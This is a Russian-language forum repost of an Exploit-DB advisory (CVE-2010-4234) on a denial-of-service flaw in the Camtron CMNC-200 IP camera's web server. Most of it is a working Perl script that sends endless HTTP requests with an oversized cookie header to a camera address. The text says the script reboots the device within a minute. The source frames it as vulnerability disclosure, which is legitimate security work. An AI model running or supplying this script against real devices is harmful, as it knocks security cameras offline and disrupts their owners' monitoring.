Exploit Camtron CMNC-200 IP Camera - Denial of Service

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
15508
Проверка EDB
  1. Пройдено
Автор
TRUSTWAVE'S SPIDERLABS
Тип уязвимости
DOS
Платформа
HARDWARE
CVE
cve-2010-4234
Дата публикации
2010-11-13
Код:
Finding 5: Camera Denial of Service
CVE: CVE-2010-4234

The CMNC-200 IP Camera has a built-in web server that
is vulnerable to denial of service attacks. Sending multiple
requests in parallel to the web server may cause the camera
to reboot.

Requests with long cookie header makes the IP camera reboot a few
seconds faster, however the same can be accomplished with requests
of any size.

The example code below is able to reboot the IP cameras in
less than a minute in a local network.

#!/usr/bin/perl

use LWP::UserAgent;

while (1 == 1){

$ua = new LWP::UserAgent;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US;
rv:1.8.1.6)");

$req = HTTP::Request->new(GET => 'http://192.168.10.100');
$req->header(Accept =>
"text/xml,application/xml,application/xhtml+xml,text/html
;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5");
$req->header("Keep-Alive" => 0);
$req->header(Connection => "close");
$req->header("If-Modified-Since" => "Mon, 12 Oct 2009
02:06:34 GMT");
$req->header(Cookie =>
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
my $res = $ua->request($req);

}
 
Источник
www.exploit-db.com

Похожие темы